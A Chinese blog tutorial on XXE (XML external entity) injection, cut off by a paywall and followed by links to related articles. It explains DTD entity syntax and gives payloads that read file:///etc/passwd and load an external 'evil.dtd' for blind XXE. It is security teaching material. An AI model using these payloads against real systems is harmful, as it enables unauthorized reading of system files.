XXE(XML External Entity attack)XML外部实体注入攻击

最新推荐文章于 2025-03-28 10:29:32 发布
最新推荐文章于 2025-03-28 10:29:32 发布
阅读量2.2k 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiaoi123/article/details/81704666
版权
本文深入探讨了XXE(XML External Entity attack)的原理、构造方法及其危害,包括文件读取、DoS攻击、命令执行等。通过实例展示了如何利用XXE进行无回显和有回显攻击,并分析了真实案例。同时,文章提供了防御XXE的策略,如禁用外部实体解析和过滤XML数据。最后,列举了多个CTF挑战和相关工具,帮助读者进一步理解XXE。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

导语

  XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。

  尽管XXE漏洞已经存在了很多年,但是它从来没有获得它应有的关注度。很多XML的解析器默认是含有XXE漏洞的,这意味着开发人员有责任确保这些程序不受此漏洞的影响。 比如今年7月刚爆出的微信支付XXE漏洞案例。

  libxml2.9.1及以后,默认不解析外部实体。可以在此了解libxml各版本具体改动情况。本次测试在Window下使用的php5.4.45(libxml Version 2.7.8)。Linux中需要将libxml低于libxml2.9.1的版本编译到PHP中,可以使用phpinfo()查看libxml的版本信息。当XML声明中standalone值是yes的时候表示DTD仅用于验证文档结构,外部实体将被禁用。但它的默认值是no,而且有些parser会直接忽略这一项。

XML外部实体

  本文主要讲外部实体注入攻击,所以基本的XML语法就不过多的描述。主要看一下DTD-实体

  首先让我们了解一下基本的PAYLOAD结构:
mark
  DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明),也可以独立的放在另外一个单独的文件中(外部引用)。

实体分为一般实体和参数实体

  1. 一般实体的声明:<!ENTITY 实体名称 "实体内容">

   引用一般实体的方法:&实体名称;

  p.s.经实验,普通实体可以在DTD中引用,可以在XML中引用,可以在声明前引用,还可以在实体声明内部引用。

  2. 参数实体的声明:<!ENTITY % 实体名称 "实体内容">

   引用参数实体的方法:%实体名称;

  p.s.经实验,参数实体只能在DTD中引用,不能在声明前引用,也不能在实体声明内部引用。

  如果实体名称中出现如<的特殊字符,解析就会失败。为了避免这种情况,XML用实体引用替换特殊字符。XML预定义了五个实体引用,即用<、 >、 &、 &apos、 "替换<>&'"

DTD实体声明(重点)

  1. 内部实体声明

  <!ENTITY 实体名称 "实体的值">

  当引用一般实体时,由三部分构成:&实体名,当是用参数传入xml的时候,&需URL编码,不然&会被认为是参数间的连接符号。

  示例:

    <?xml version = "1.0" encoding = "utf-8"?>
    <!DOCTYPE test [
    <!ENTITY writer "Dawn">
    <!ENTITY copyright "Copyright W3School.com.cn">
    ]>
    <test>&writer;©right;</test>

  2. 外部实体声明

  <!ENTITY 实体名称 SYSTEM "URI/URL">

  外部实体可支持http、file等协议。不同程序支持的协议不同,如下图:
mark
  其中PHP支持的协议会更多一些,但是需要一定的扩展支持:
mark

  示例:

    <?xml version = "1.0" encoding = "utf-8"?>
    <!DOCTYPE test [
    <!ENTITY file SYSTEM "file:///etc/passwd">
    <!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
    ]>
    <author>&file;©right;</author>

XXE的攻击与危害

  当我们了解清楚以上的信息后,我们就能理解如何构造外部实体注入攻击与它的危害性了。

如何构造外部实体注入攻击

  一般xxe利用分为两大场景:有回显和无回显。有回显的情况可以直接在页面中看到payload的执行结果或现象,无回显的情况又称为blind xxe,可以使用外带数据通道提取数据。

  有回显的payload写法:

  1. 直接通过DTD外部实体声明。XML内容如下:

            <?xml version="1.0"?>
        <!DOCTYPE ANY [
                <!ENTITY test SYSTEM "file:///etc/passwd">
        ]>
        <abc>&test;</abc>

  2. 通过DTD文档引入外部DTD文档,再引入外部实体声明。XML内容如下:

            <?xml version="1.0"?>
        <!DOCTYPE a SYSTEM "http://localhost/evil.dtd">
        <abc>&b;</abc>

    evil.dtd内容:

           
最低0.47元/天 解锁文章
XML外部实体注入XML External EntityXXE)漏洞详解
weixin_42489549的博客
02-11 978
XML外部实体注入XXE)是一种安全漏洞,攻击者通过利用XML解析器对外部实体的处理机制,读取本地文件、探测内网资源、执行远程请求,甚至触发拒绝服务攻击(DoS)。XXE漏洞通常出现在应用程序解析用户提供的XML输入且未禁用外部实体加载时。
XML External Entity attack
DYBOY-程序开发&网络安全
07-31 488
XXE漏洞 XML 被设计用来传输和存储数据。 语法规则 &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;!--XML 声明--&gt; &lt;girl age="18"&gt;  &lt;!--自定的根元素girl;age属性需要加引导--&gt; &lt;hair&gt;长头发&lt;
【网络安全零基础入门】之XML外部实体注入(非常详细)建议收藏!
最新发布
白帽阿叁的博客
03-28 556
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
XXE漏洞--XML外部注入实体攻击初步学习--[NCTF 2019]Fake XML cookbook
qq_75120258的博客
04-25 926
XXEXML External Entity)(XML外部实体注入)是一种针对应用程序处理XML数据的方式的攻击。在这种攻击中,攻击者利用应用程序对XML输入的处理不当,引入或“注入”恶意内容。这可能导致未授权的数据访问、服务拒绝攻击甚至执行远程代码。
XML外部实体引用(XXEXML External Entity attack)漏洞原理及其预防
qq_gfq的博客
03-26 5750
0x00 什么是XMLXML 指可扩展标记语言(EXtensible Markup Language),是一种用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。和HTML类似,但HTML被设计来显示数据,XML被设计来传输数据。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。https://mp.csdn....
34-XXEXML外部实体注入
XLbb的博客
05-19 1167
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
XML external entity (XXE) injection
qq_52579508的博客
07-17 891
burpsuit 靶场的 xxe
XXE(外部实体注入攻击)
热门推荐
sh0rk的博客
11-24 1万+
XXE什么是XXE利用方法进阶学习防御理论上的防御措施实践有效的防御措施 什么是XXE XXEXML External Entity外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 利用方法 file:///C:/Windows/win.ini &lt;?xml versi...
Microsoft Internet Explorer v11 / XML External EntityInjection 0day
weixin_34095889的博客
04-14 153
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.t...
XXE(xml外部实体攻击)
HoYim
04-11 4548
1、概念 XXEXML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 (简单来说,XXE就是XML外部实体注入。当应用程序允许引用外部实体时,通过构...
[XML外部实体***]XXE attack
weixin_34209406的博客
11-29 206
Pnig0s p.s:最近80Sec发表了一篇关于介绍XML实体注入漏洞的警告文章,其实查阅相关资料可以发现XML外部实体***相关技术早在02年就在国外被提出,文中明确提到几种编程语言的xml应用中均存在***风险,现将原文贴出: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Gregory Steuck se...
XXE - XML外部实体注入攻击
javaEE_zero的博客
01-04 666
XXE漏洞、XML外部实体注入攻击
XMLXXE漏洞 XML外部实体注入攻击
qq_60115503的博客
05-24 1353
XXE:XML External Entity外部实体,从安全角度理解成XML External attack外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者通过ENTITY伪造外部实体构成,比如PHP中simplexml_load默认情况下会解析外部实体,XXE标志性函数simplexml_load_string()
XML External Entities 攻击XML外部实体注入
weixin_45352161的博客
05-17 3685
使用配置的 XML 解析器无法预防和限制外部实体进行解析,这会使解析器暴露在 XML External Entities 攻击 之下 说明: XML External Entities 攻击可利用能够在处理时动态构建文档的 XML 功能。XML 实体可动态包含来自给定资 源的数据。外部实体允许 XML 文档包含来自外部 URI 的数据。除非另行配置,否则外部实体会迫使 XML 解 析器访问由 URI 指定的资源,例如位于本地计算机或远程系统上的某个文件。这一行为会将应用程序暴露给 XM
XXE: XML eXternal Entity Injection vulnerabilities
weixin_30791095的博客
01-06 322
From:https://www.gracefulsecurity.com/xml-external-entity-injection-xxe-vulnerabilities/ Here’s a quick write-up on XXE, starting with how to detect the vulnerability and moving on to how to fix it...
xml注入漏洞
weixin_45095113的博客
10-28 5268
xml注入
关于xml实体攻击的讨论
tlxamulet的博客
02-12 966
xml实体攻击
(十二)XML外部实体XXE注入
weixin_43047908的博客
04-16 2122
目录一、什么是XML外部实体注入?二、XXE漏洞如何产生?什么是XML?什么是XML实体?什么是文件类型定义(DTD)?什么是XML自定义实体?什么是XML外部实体?三、XXE攻击有哪些类型?利用XXE检索文件利用XXE执行SSRF攻击四、寻找用于XXE注入的隐藏攻击面XInclude攻击通过文件上传进行XXE攻击通过修改的内容类型进行XXE攻击五、如何预防XXE漏洞 一、什么是XML外部实体注入XML外部实体注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通
XML外部实体攻击:原理、风险与防御
然而,XML的特性之一——外部实体,也带来了安全风险,即XML外部实体攻击XXEXML External Entity Attack)。这种攻击利用了XML解析器处理外部实体的方式,可能导致敏感信息泄露、拒绝服务(DoS)甚至是跨站请求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值